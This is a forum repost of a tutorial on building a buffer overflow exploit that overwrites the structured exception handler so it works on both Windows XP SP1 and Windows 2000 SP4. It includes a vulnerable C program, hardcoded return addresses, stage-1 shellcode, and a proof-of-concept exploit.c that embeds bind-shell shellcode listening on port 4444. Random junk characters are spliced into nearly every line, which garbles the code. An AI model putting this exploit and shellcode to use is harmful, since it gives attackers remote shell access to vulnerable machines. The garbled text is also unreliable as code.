The goal of this method is to create a stable exploit that will successfully exploit a buffer overflow vulnerability on multiple operating systems. Every windows application has a default exception handler that is located at the end of the stack. When exploiting a normal buffer overflow vulnerability we overwrite the return address but in this case we will continue overwriting the stack and overwrite the default exception handler as well.9 k2 ^, ~! O! k3 d* X: S6 p
' x/ C9 c* _" r- c, N) A
[Buf] <- Shellcode7 ]; J2 F, w: Y- N* O- l. i/ O8 y
[Return Address] <- jmp register (for Windows XP sp1) ' E5 P& l- c3 f( g; S1 {5 U) }[Various Stack Data] <- Junk9 }5 B4 ]' e; g; c6 Z
[Pointer To Next SEH] <- "\xEB\x06\xff\xff" jump 6 bytes forward 2 o% L3 g# n) W' p- B[SE Handler] <- jmp register (for Win2k sp4)) _) z1 ^7 l5 z$ [, l
[Stage1 Shellcode] <- stage1 shellcode for win2k3 V- ~! a# f( Z2 ?
' K2 M' C( v! h' a7 O& G8 {& Q$ C
If the first return address (Windows XP SP1) is wrong an exception will occur and the default exception handler will be called (Windows 2000 SP4). Thus allowing us to create a stable exploit with two return addresses, N5 v$ G- G# v
3 c% H: S& @8 G/ E8 C7 e# L
Necessary Tools: ; J6 B5 l9 G+ \8 D7 E- OllyDBG 9 F: V) `7 i5 d H2 z! ~; w$ j- C/C++ Compiler4 j& h" A- @& G( a
- nasm1 o; s, H. T4 h
- Sac" B+ L; a6 N. c
4 d. }: W0 X( N# a* {4 C& y$ g' `char buf[512];& {/ a1 ?+ J% L1 V+ Y' c
char buf1[1024]; // <- simulate a stack 1 c) }' ^3 j* }; ]1 G& c* O//DebugBreak(); ! N& ~0 u r; s) xif (argc != 2){ return -1; }7 }3 j" Q/ C8 y0 P
8 T4 D/ o9 Z: Q. J6 i7 d% j7 astrcpy(buf,argv[1]);7 A4 P1 g* b/ {5 }6 e R2 U7 S
return 0x0;3 f1 L T5 t8 Z8 h0 V% F
} 9 K- n! j2 d3 Q+ W8 Y% Z8 P+ N3 j) x
Getting Started: . O) M3 V9 i9 U* s) sBefore writing the exploit, lets see what happens when we overflow this application with 1600 bytes. The application crashed in the following state of registers: ! F' c6 ^7 S" K# m2 l + ?) k6 H# h) @2 y+ z+ {, d# nEAX 00000000 & b6 b5 k; u/ |* LECX 00321404+ s- S: K2 k: B- m$ z5 K
EDX 00414141 6 G- Z8 I' P$ F, b8 `EBX 7FFDF0008 q$ s+ ?' K/ g6 ?
ESP 0012FF88 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 2 ~! Q' g) c' C& nEBP 41414141 - F6 a# `$ j% d9 nESI 77D4595F/ v) M- h% ~5 h2 B
EDI 77F59037 ntdll.77F59037 9 Y7 f. s/ ~- \' N" y0 eEIP 41414141( V0 m; O D$ z# ~: T$ v+ x+ ~
% [, O) o( O6 B1 N6 T7 D
Lets take a look at the stack and see what happened to the default exception handler: ' l! M5 H) b9 y9 O0x0012FFB0 41414141 Pointer to next SEH Record, m6 c4 F- _5 b; d
0x0012FFB4 41414141 SE Handler 5 B3 o9 I: r. K5 H& l7 F; x2 z9 f2 ?! D
We successfully overwrote the return address and the default exception handler. - Z5 D5 n& n, x7 F$ e4 l6 p4 r1 p1 u% I1 A3 b- o4 E c. k B; i
Primary Return Address (Windows XP SP1 EN):4 `; W* ^2 b; o8 Q
The first return address will be called as in a normal stack overflow. We can see that esp points to user-input, we will use that as our first stage shellcode. The return address will be 0x77F8AC16 (jmp esp on Windows XP SP1 En), and our first stage shellcode will be: $ F4 j3 _8 E& h; l"\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4" . `1 j: d l v5 s8 O) w/ E: E) t5 @& Y! Y$ m
Secondary Return Address (Windows 2000 SP4 EN):" \ ~, [' S2 L8 g) h% x& @; o- O
The secondary return address will be called as in a normal SEH return. The return address will be 0x77F92A9B (jmp ebx on Win2k Sp4 En), and our first stage shellcode will be: 0 r- H" t, E; `# b% P"\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1"7 N+ s+ D2 w+ I
) f+ R9 E p8 ?7 Q- Y; tProof Of Concept: 7 @; g9 O* ~$ H: ?; w. J- H4 ?. u// exploit.c 4 }$ H: G. p' o5 A N* h! {; ]// Tal zeltzer - [Double Return] //$ l) \ T1 u0 q q$ H) {3 F
8 I8 ?2 m; I3 U& @6 z; P#include<stdio.h> ' w/ H3 B: O7 z2 ~#include<string.h>( e9 L5 o& l9 W& B- p0 w, y0 O
#include<windows.h> . u* F: B9 v% {0 f" ]5 O & ^/ E0 q6 A" i( a S4 I#define RET_XP 0x77F8AC16 // WinXP Sp1 English - jmp esp : m8 C$ i5 Z3 H& r {#define RET_WIN2K 0x77F92A9B // Win2k Sp4 English - jmp ebx 5 T6 E) p: w$ ~! E9 p& y& ] 1 f. a" x) a& D9 x// Stage1 For WinXP Sp1 English; o( o0 K" H( V' d) s0 S' a5 G, z9 T
unsigned char stage1_1[] = "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"; 3 f$ }3 J3 F) c2 h0 E7 W0 e& Q# M8 B# m" E5 P
// Stage1 For Win2k Sp4 English, p0 L) l- o' X; S u6 M! A
unsigned char stage1_2[] = "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1"; ( A/ P& K# E! q& H + o7 P6 A" E" _5 T+ r// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] _blank>http://metasploit.com , u& R+ y& @& G x5 V2 E; junsigned char shellcode[] =/ ]( I7 g5 B( A$ b
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"/ c! d: z5 _9 X7 e0 o
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"( N( u4 F- E& q) ~
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"( W% g3 |; ]+ ^ I% _$ {
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"6 q! K7 U1 o( [, M
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74" # k$ y% K4 a, O8 e: N"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"! m" `. Y$ j& J% I$ q' \' J4 d( V
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14". U' ?" B; V0 @0 I& s
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"' W( ^4 B; l/ _3 z& y4 g
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"- f8 g2 J. z# @, [. z# w
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf" & X: C; x8 m+ b* \- s" u$ F"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"% q: l O4 L3 s- J1 w
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18" 3 G+ s* e+ e% F0 e1 {"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"4 G) L' a' E2 E
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"6 M( z% s- \% q$ m4 a2 R
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"% D' b9 U: ]9 N" e1 B3 t6 G; C
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"- g* v, F0 @- X8 g( @# p% A3 g
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18" & }3 p3 T$ @3 a"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f" , q; t" o! V& x1 V7 z+ b4 ~"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"8 i; W3 w$ X8 x0 c, z! I6 S
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"; m( o# @2 h/ D
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"( r1 w" p; z3 M1 U$ G4 O
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"7 n2 m% M! ?6 Z5 w4 V/ L
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"8 ^# D! ^" `) K' a) Z% r
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a" , x& p5 W5 y1 v K"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98"; 1 ^0 X% W# A _4 Z/ m1 \1 I6 ]: X/ w+ Q% L7 T# T: k
IP卡
狗仔卡
发表于 2004-11-19 10:39
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
